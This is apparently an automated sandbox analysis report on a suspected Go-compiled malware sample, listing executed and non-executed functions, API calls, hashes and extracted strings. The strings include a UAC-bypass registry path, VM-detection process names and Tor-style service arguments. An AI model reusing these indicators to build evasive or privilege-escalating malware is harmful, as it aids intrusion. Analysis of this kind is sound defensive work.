                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 011707EE
                                                                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 0117080E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_1170000_sUyDoVTGsfEnMY0oeyexTBut.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction ID: 174029d3402c47cbeefb4f5bba6325a560fb38a43e0ee9e65e9618db05da0505
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13F096316007156FE7243BF9A88DB6FB7F8AF4E725F100528F643912C0DB70E8458A61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01170485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 13 1170485-11704bf call 1170798 16 11704c1-11704f4 VirtualAlloc call 1170512 13->16 17 117050d 13->17 19 11704f9-117050b 16->19 17->17 19->17
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 011704D6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_1170000_sUyDoVTGsfEnMY0oeyexTBut.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                              • Instruction ID: 2e67cf3d54b687679cc53ce6c70565bd464f98ad1938219fb581916462b5f785
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E113C79A00208EFDB01DF98C985E99BFF5AF08350F058094F9489B361D371EA90DF90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              Function 00433840 Relevance: 12.7, Strings: 10, Instructions: 172COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00433B27
                                                                                                                                                                                                                                                              • bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t, xrefs: 00433A4A
                                                                                                                                                                                                                                                              • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00433ACC
                                                                                                                                                                                                                                                              • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g , xrefs: 004339DB
                                                                                                                                                                                                                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00433A71
                                                                                                                                                                                                                                                              • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st, xrefs: 00433B5B
                                                                                                                                                                                                                                                              • ,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos, xrefs: 00433A05
                                                                                                                                                                                                                                                              • %, xrefs: 00433B64
                                                                                                                                                                                                                                                              • CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return, xrefs: 00433B00
                                                                                                                                                                                                                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00433AA5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000840000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000C77000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000C7A000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000CCF000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000CD3000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000CEF000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000CF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_400000_sUyDoVTGsfEnMY0oeyexTBut.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %$,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos$CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return$VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu$bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g
                                                                                                                                                                                                                                                              • API String ID: 0-2845907608
                                                                                                                                                                                                                                                              • Opcode ID: cda95a6b52bc2c63e47a780035ab25b24c1949c9f4bfe426746d15a289d38b8f
                                                                                                                                                                                                                                                              • Instruction ID: 54d86a38c7ca5e9b4d361dfb47ed8c6cf3eb888c171a558932b5f88d5bc68312
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cda95a6b52bc2c63e47a780035ab25b24c1949c9f4bfe426746d15a289d38b8f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8281CFB45097018FD700EF66C18575AFBE0BF88708F41992EF49887392EB789949CF5A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00443890 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip, xrefs: 004439E1
                                                                                                                                                                                                                                                              • releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog, xrefs: 00443929
                                                                                                                                                                                                                                                              • p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req, xrefs: 00443997
                                                                                                                                                                                                                                                              • m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr, xrefs: 0044394B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000011.00000002.3026570515.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000840000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000C77000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000C7A000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000CCF000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000CD3000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000CEF000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000011.00000002.3026570515.0000000000CF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_400000_sUyDoVTGsfEnMY0oeyexTBut.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr$ p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req$releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip$releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
                                                                                                                                                                                                                                                              • API String ID: 0-3530339137
                                                                                                                                                                                                                                                              • Opcode ID: a7f15cb5df55ae240ca969d500f5237d0066f14aa6d6fc760e8503cdf6a840d6
                                                                                                                                                                                                                                                              • Instruction ID: 41eda2ad12dc9040aabd0b4fda58d31df6fc94468559f7c6cc3daccb715ab915
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7f15cb5df55ae240ca969d500f5237d0066f14aa6d6fc760e8503cdf6a840d6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C31E2B45087418FD700EF25C185B1AFBE1BF88708F45882EF4888B352DB789948CB6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              Function 010227C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 010227EE
                                                                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 0102280E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, Offset: 01022000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_1022000_VvPx7JMqkEvTJAQ2rPS2y2wf.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction ID: 4a569258bbb730b22cbc9acf78d0f3d0392d83352f4479364ffe5e8861f80bb6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BF096312007316FE7203BF9AC8DBAE76E8BF49625F100568F686910C0DBB0E9454661
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 01022485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 13 1022485-10224bf call 1022798 16 10224c1-10224f4 VirtualAlloc call 1022512 13->16 17 102250d 13->17 19 10224f9-102250b 16->19 17->17 19->17
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 010224D6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, Offset: 01022000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_1022000_VvPx7JMqkEvTJAQ2rPS2y2wf.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                              • Instruction ID: 5d2a677e0efc31f0e50293741b0addbe038c8ce3f71a066f7f3f275ab986689b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F112B79A00218EFDB01DF98C985E99BBF5AF08350F058094F9889B361D371EA90DF80
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                                              Function 00433840 Relevance: 12.7, Strings: 10, Instructions: 172COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00433A71
                                                                                                                                                                                                                                                              • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g , xrefs: 004339DB
                                                                                                                                                                                                                                                              • ,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos, xrefs: 00433A05
                                                                                                                                                                                                                                                              • bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t, xrefs: 00433A4A
                                                                                                                                                                                                                                                              • %, xrefs: 00433B64
                                                                                                                                                                                                                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00433AA5
                                                                                                                                                                                                                                                              • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st, xrefs: 00433B5B
                                                                                                                                                                                                                                                              • CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return, xrefs: 00433B00
                                                                                                                                                                                                                                                              • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00433B27
                                                                                                                                                                                                                                                              • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00433ACC
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000012.00000002.3183446408.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000840000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000C77000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000C7A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000CCF000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000CD3000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000CEF000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000012.00000002.3183446408.0000000000CF6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_18_2_400000_VvPx7JMqkEvTJAQ2rPS2y2wf.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %$,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos$CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return$VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu$bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g
                                                                                                                                                                                                                                                              • API String ID: 0-2845907608
                                                                                                                                                                                                                                                              • Opcode ID: cda95a6b52bc2c63e47a780035ab25b24c1949c9f4bfe426746d15a289d38b8f
                                                                                                                                                                                                                                                              • Instruction ID: 54d86a38c7ca5e9b4d361dfb47ed8c6cf3eb888c171a558932b5f88d5bc68312
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cda95a6b52bc2c63e47a780035ab25b24c1949c9f4bfe426746d15a289d38b8f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8281CFB45097018FD700EF66C18575AFBE0BF88708F41992EF49887392EB789949CF5A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00443890 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip, xrefs: 004439E1
                                                                                                                                                                                                                                                              • m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr, xrefs: 0044394B
                                                                                                                                                                                                                                                              • releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog, xrefs: 00443929
